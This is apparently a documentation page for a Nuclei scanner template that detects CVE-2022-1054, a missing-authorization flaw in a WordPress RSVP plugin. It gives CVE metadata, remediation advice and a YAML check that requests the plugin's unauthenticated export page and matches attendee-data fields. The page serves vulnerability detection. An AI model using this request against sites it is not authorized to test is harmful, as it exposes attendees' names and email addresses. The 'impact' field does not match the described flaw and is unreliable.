WordPress RSVP and Event Management <2.7.8 - Missing Authorization
ID: CVE-2022-1054
Severity: medium
Author: Akincibor
Tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill
Description
Section titled “Description”WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
YAML Source
Section titled “YAML Source”id: CVE-2022-1054
info: name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization author: Akincibor severity: medium description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events, impact: | An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events. remediation: | Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later. reference: - https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.00292 epss-percentile: 0.69101 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: wpchill product: rsvp_and_event_management framework: wordpress tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill
http: - method: GET path: - '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and matchers: - type: word part: body words: - 'RSVP Status' - '"First Name"' condition: and
- type: status status: - 200# digest: 4a0a0047304502202562ad9a8a2fbd05851d347e2467c3bc21a04869993dc4c3f13299e765154354022100cc99bdc6537feb1ec0f68e18d31ffd39fc05e7b9c935fccd6aa7bba0f96a456f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1054.yaml"